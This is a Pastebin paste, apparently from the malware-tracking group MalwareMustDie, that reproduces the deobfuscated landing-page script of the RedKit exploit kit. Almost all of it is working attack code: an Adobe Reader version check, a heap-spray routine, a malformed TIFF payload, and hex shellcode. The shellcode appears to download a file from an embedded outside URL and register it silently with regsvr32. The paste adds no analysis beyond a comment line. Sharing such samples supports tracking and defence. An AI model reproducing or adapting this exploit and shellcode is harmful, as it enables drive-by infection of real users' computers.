Advertisement
MalwareMustDie

RedKit - Landing page script 20120112-3

Jan 11th, 2013
1,974
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. //decode...get the eval() <-- just run it as per it is..
  2.  
  3. Midias = unescape(gerpsoi.replace(/CHoedsp/g, dsprpa.charAt(1)));
  4.  
  5. // written values:
  6.  
  7. /*dbgbgfgd dswd*/var doogo = 'ikgoweewepowehjw[hhwehweh';
  8. var j_IgC = [31, 31, 15, 23];
  9. function _k_m(){
  10.   return app;
  11. }
  12. function _b_(xVgFqV){
  13.   var ___N = '';
  14.   ___N = unescape(xVgFqV);
  15.   return ___N;
  16. }
  17. function get_ver(){
  18.   var ver = _k_m().viewerVersion.toString();
  19.   ver = ver.replace('.', '');
  20.   while (ver.length < 4){
  21.     ver += '0';
  22.   }
  23.   ver = parseInt(ver, 10);
  24.   return ver;
  25. }
  26. function make_block(xVgFqV, len){
  27.   while (xVgFqV.length * 2 < len){
  28.     xVgFqV += xVgFqV;
  29.   }
  30.   xVgFqV = xVgFqV.substring(0, len / 2);
  31.   return xVgFqV;
  32. }
  33. function heap_spray3(scode){
  34.   scode = _b_(scode);
  35.   var sclen = scode.length * 2;
  36.   var fxcvxx = _b_('%u9090');
  37.   var spray = make_block(fxcvxx, 0x2000 - sclen);
  38.   var block = scode + spray;
  39.   block = make_block(block, 0x80000 - 0x40);
  40.   for (var i = 0; i < 0x190; i ++ ){
  41.     j_IgC[i] = block.substr(0, block.length - 1) + fxcvxx;
  42.   }
  43.   return ;
  44. }
  45. function make_str(xVgFqV, len){
  46.   while (xVgFqV.length < len){
  47.     xVgFqV += xVgFqV;
  48.   }
  49.   xVgFqV = xVgFqV.substring(0, len);
  50.   return xVgFqV;
  51. }
  52. function num2hex(num){
  53.   var xVgFqV = num.toString(16);
  54.   var len = xVgFqV.length;
  55.   var ret = (len % 2) ? '0' + xVgFqV : xVgFqV;
  56.   return ret;
  57. }
  58. function str2uni(xVgFqV){
  59.   var ret = '';
  60.   for (var i = 0; i < xVgFqV.length; i += 2){
  61.     ret += '%u';
  62.     ret += num2hex(xVgFqV.charCodeAt(i + 1));
  63.     ret += num2hex(xVgFqV.charCodeAt(i));
  64.   }
  65.   return ret;
  66. }
  67. function hex2str(hex){
  68.   var ret = '';
  69.   for (var i = 0; i < hex.length; i += 2){
  70.     var b = hex.substr(i, 2);
  71.     var num = parseInt(b, 16);
  72.     ret += String.fromCharCode(num);
  73.   }
  74.   return ret;
  75. }
  76. splaui();
  77. function splaui(){
  78.   var ver = get_ver();
  79.   if (ver >= 0x1f40){
  80.     var tiff = 'SUkqADggAABB';
  81.     var nops = make_str('QUFB', 0x2ae8);
  82.     var start = '
  83. QQcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAA
  84. EAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////';
  85.     var foot = '';
  86.     var sc_hex = '';
  87.     if (ver < 0x2009){
  88.       foot = 'o+uASjgggkpuL4BK/////wAAAABAAAAAAAAAAAAQAAAAAAAAfhaASiAgYA98EIBK';
  89.       var sc_hex = '
  90. 4c20600f0517804a3c20600f0f63804aa3eb804a3020824a6e2f804a4141414126000000000000000000000000
  91. 0000001239804a6420600f0004000041414141414141416683e4fcfc85e47534e95f33c0648b40308b400c8b70
  92. 1c568b760833db668b5e3c0374332c81ee1510ffffb88b4030c346390675fb87342485e47551e9eb4c51568b75
  93. 3c8b74357803f5568b762003f533c94941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e
  94. 2403dd668b0c4b8d46ecff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf38b6808
  95. 8bf76a0559e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1083c305ffe3686f6e
  96. 00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5c240cc7042472656773c7442404
  97. 76723332c7442408202d73205368f8000000ff560c8be833c951c7441d0077706274c7441d052e646c6cc6441d
  98. 0900598ac1043088441d0441516a006a0053576a00ff561485c075166a0053ff56046a0083eb0c53ff560483c3
  99. 0ceb02eb1347803f0075fa47803f0075c46a006afeff5608e89cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b
  100. 1bc64679361a2f70687474703a2f2f77696e6465726d657265636f74746167652e636f2e756b2f36322e68746d
  101. 6c0000';
  102.     }
  103.     else {
  104.       foot = 'kB+ASjiQhEp9foBK/////wAAAABAAAAAAAAAAAAQAAAAAAAAYxCASiAgYA/fE4BK';
  105.       sc_hex = '
  106. 4c20600fa563804a3c20600f9621804a901f804a3090844a7d7e804a4141414126000000000000000000000000
  107. 0000007188804a6420600f0004000041414141414141416683e4fcfc85e47534e95f33c0648b40308b400c8b70
  108. 1c568b760833db668b5e3c0374332c81ee1510ffffb88b4030c346390675fb87342485e47551e9eb4c51568b75
  109. 3c8b74357803f5568b762003f533c94941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e
  110. 2403dd668b0c4b8d46ecff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf38b6808
  111. 8bf76a0559e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1083c305ffe3686f6e
  112. 00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5c240cc7042472656773c7442404
  113. 76723332c7442408202d73205368f8000000ff560c8be833c951c7441d0077706274c7441d052e646c6cc6441d
  114. 0900598ac1043088441d0441516a006a0053576a00ff561485c075166a0053ff56046a0083eb0c53ff560483c3
  115. 0ceb02eb1347803f0075fa47803f0075c46a006afeff5608e89cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b
  116. 1bc64679361a2f70687474703a2f2f77696e6465726d657265636f74746167652e636f2e756b2f36322e68746d
  117. 6c0000';
  118.     }
  119.     if (foot.length){
  120.       var ret = [tiff, nops, start, foot].join('');
  121.       var sc_str = hex2str(sc_hex);
  122.       var scode = str2uni(sc_str);
  123.       heap_spray3(scode);
  124.       rVBGo.rawValue = ret;
  125.     }
  126.   }
  127. }
  128. #malwareMustDie!
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement